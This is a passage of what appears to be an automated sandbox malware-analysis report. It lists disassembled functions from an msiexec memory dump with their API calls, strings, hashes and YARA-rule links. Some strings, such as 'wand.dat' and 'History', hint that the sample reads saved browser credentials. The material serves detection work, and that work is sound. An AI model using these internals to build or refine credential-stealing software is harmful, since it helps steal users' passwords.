                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                    • free.MSVCRT ref: 0040E9D3
                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$free
                                                                    • String ID:
                                                                    • API String ID: 2241099983-0
                                                                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                    Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                    • malloc.MSVCRT ref: 004174BD
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                    • free.MSVCRT ref: 004174E4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                    • String ID:
                                                                    • API String ID: 4053608372-0
                                                                    • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                    • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                    Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                    • String ID:
                                                                    • API String ID: 4247780290-0
                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                    Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                    • memset.MSVCRT ref: 004450CD
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                    • String ID:
                                                                    • API String ID: 1471605966-0
                                                                    • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                    • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                    Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                    • String ID: \StringFileInfo\
                                                                    • API String ID: 102104167-2245444037
                                                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                    Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                    Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _memicmpwcslen
                                                                    • String ID: @@@@$History
                                                                    • API String ID: 1872909662-685208920
                                                                    • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                    • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                    Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004100FB
                                                                    • memset.MSVCRT ref: 00410112
                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                    • String ID: </%s>
                                                                    • API String ID: 3400436232-259020660
                                                                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                    Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D58D
                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                    • String ID: caption
                                                                    • API String ID: 1523050162-4135340389
                                                                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                    Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                    • String ID: MS Sans Serif
                                                                    • API String ID: 210187428-168460110
                                                                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                    Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcsicmpmemset
                                                                    • String ID: edit
                                                                    • API String ID: 2747424523-2167791130
                                                                    • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                    • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                    Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                    • API String ID: 3150196962-1506664499
                                                                    • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                    • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                    Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memcmp
                                                                    • String ID:
                                                                    • API String ID: 3384217055-0
                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                    Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset$memcpy
                                                                    • String ID:
                                                                    • API String ID: 368790112-0
                                                                    • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                    • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                    Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                    • String ID:
                                                                    • API String ID: 1889144086-0
                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                    Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                    • String ID:
                                                                    • API String ID: 1661045500-0
                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                    Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                    Strings
                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset
                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                    • API String ID: 1297977491-2063813899
                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                    Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040560C
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                    • String ID: *.*$dat$wand.dat
                                                                    • API String ID: 2618321458-1828844352
                                                                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                    Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                    • _wtoi.MSVCRT(?), ref: 00410C80
                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                    • String ID:
                                                                    • API String ID: 1549203181-0
                                                                    • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                    • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
